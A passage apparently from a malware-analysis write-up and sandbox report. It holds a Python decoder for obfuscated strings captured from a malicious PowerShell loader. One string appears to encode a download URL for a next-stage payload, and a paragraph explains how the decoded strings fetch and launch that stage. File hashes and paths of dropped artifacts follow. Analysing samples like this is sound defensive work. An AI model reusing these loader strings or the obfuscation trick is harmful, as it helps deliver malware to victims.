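SKEETSKYDNING = 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip '
FORSMDELIGHEDER = ' kao.iniK artaleAvlsk,exsquilge '


def decode_captured_strings() -> dict:
    """Decode the three captured strings; returns PowerShell variable name -> cleartext."""
    return {
        "Byretternes248": decode(BYRETTERNES248),
        "Skeetskydning": decode(SKEETSKYDNING),
        "Forsmdeligheder": decode(FORSMDELIGHEDER),
    }


if __name__ == "__main__":
    # Recreate the method-name trick, then decode the strings.
    assert method_name(cmd_set_a_xor("115^^0")) == "substring"
    for name, clear in decode_captured_strings().items():
        print(f"{name}: {clear}")
```

To finish the job on a full capture, collect every `Genanvendelsesprocessens '...'` argument (a regex over the command line is enough, once the line breaks the sandbox inserted are joined) and run `decode` over each; the `while (-not $Lowering)` loop and the later strings are what download, read and launch the next stage, and the same 7/8 stride applies to all of them.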
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 344B
  MD5: 0250596cd7064b5a57b4367a7ca7af90
  SHA1: 5e8c88112e62648215b76323353ceedeb0261ce6
  SHA256: ef0b6ea2ee2c0cc0a4d9335e5c07599f8aa12adf6473a6a768937463652fcea3
  SHA512: d3c1afad19c1a08d15628bd762bbec9e9c2c32a6c7fac3247f6052314199194616234eee928740e233bfb78a8c0a41bdea34987525216690d44f6062a5e42763

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 344B
  MD5: e9a2db3c218cd02fbd23c3ffdd7f9e02
  SHA1: 8abc9172b0d4631ab0ab99988b25be4529e03644
  SHA256: ec015b733fe5f63d3d928e1cd6148e257aa9ee047104c1d4804a82a0471ac76d
  SHA512: 5a59c89daeab23978422138d6b640c6d67ffc6b15078cd4ceeb8d1ba42445ab7a7a1ffcdc93ffdf202dfd45b470359d3d3d1dd73854bbdcdb9a95da520eea1a6

(path not listed)
  Filesize: 68KB
  MD5: 29f65ba8e88c063813cc50a4ea544e93
  SHA1: 05a7040d5c127e68c25d81cc51271ffb8bef3568
  SHA256: 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
  SHA512: e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

(path not listed)
  Filesize: 386B
  MD5: c182cc2051a1f2cb0f78364db81b9fc1
  SHA1: afef4d6a4f66aa307df4ed1179256d4667444585
  SHA256: 5e29ffa5f6109f87e5d4205a591bbc8fcb529e3643462f6487b5479eb46d79be
  SHA512: 40b2d28acdfa3eda9997c385a67e86c0a120e1a12cc3c51ff2d649c262f458089be88c63ac042b43fed19386e6664bba6a632db67357f71f53c4719f30b37eac

(path not listed)
  Filesize: 682B
  MD5: 8554355ff9009da1b1c8536a9bb2e2fd
  SHA1: 539aef5de341d53a43fa26a2d5e6ddd7f82a508d
  SHA256: aa4e604ec667d549b72c32b33e76269b0cdabc5c747b67889e7bfad238760d39
  SHA512: 256472a8fa9f1381fedf8ed14858786f63ed4fa176eb5940abf5d90dc2547356458a9cbf5ec39de949e7a79c698fe91c708ebd8114d759d310c9f308e44bdb94

(path not listed)
  Filesize: 1KB
  MD5: e55e9d1ae5fe8f525a35539ef7cb8a26
  SHA1: eae2cc90fe2fff8c8391a4ba827aa06064c729bc
  SHA256: 4a45982b8c4124238f30262f24e37fd9dd3461728376854a3b7efb0fadc7c585
  SHA512: bfebd15265f78a76f237c2bd695b813f0580cece1a53ca61291011c1edfa8845e2e436ea609b3cfb4be94001106ec8373438dc8483656ba33209db29c815cf89

(path not listed)
  Filesize: 5KB
  MD5: 41077e923293898955e78267b7878339
  SHA1: 36083128a00b83103bfe8bc36b0042ff6a703012
  SHA256: 4d9b1845d8c7b9f85c23bf670d2df4757bfdd59ac5ccebee2df7cbb3b26292f0
  SHA512: 070c9f8fc7fb22dda57f57c950250b4476f4790c91b0e26616db50a053a4b385b302f30d19a82475252e21942532925d64e9216938f37d751af2e2af31f7c922

(path not listed)
  Filesize: 177KB
  MD5: 435a9ac180383f9fa094131b173a2f7b
  SHA1: 76944ea657a9db94f9a4bef38f88c46ed4166983
  SHA256: 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
  SHA512: 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-406356229-2805545415-1236085040-1000\0f5007522459c86e95ffcc62f32308f1_4c23b8b8-1f37-4b25-86d9-da21829a4de6
  Filesize: 46B
  MD5: d898504a722bff1524134c6ab6a5eaa5
  SHA1: e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
  SHA256: 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
  SHA512: 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-406356229-2805545415-1236085040-1000\0f5007522459c86e95ffcc62f32308f1_4c23b8b8-1f37-4b25-86d9-da21829a4de6
  Filesize: 46B
  MD5: c07225d4e7d01d31042965f048728a0a
  SHA1: 69d70b340fd9f44c89adb9a2278df84faa9906b7
  SHA256: 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
  SHA512: 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EM8DQYYW9H7S7EBS6TKR.temp
  Filesize: 7KB
  MD5: 1af72430a9d0a1b2bbd984d5e23e81aa
  SHA1: bf5d0480b4dc3bb98d8b439fe71af29058f4baf8
  SHA256: 35df3e1bc498ec96e4c32c1185b5fa898b27336db00fe71d26f118cff3ed0ce3
  SHA512: 65904ba5927e73ee66ba5545ef3d74605e343838883a89402f594246ecb1ccc2e38cab39279eacf0751b440d5b4ae6779cb0e9ff25db959d12eae571f1fe3e06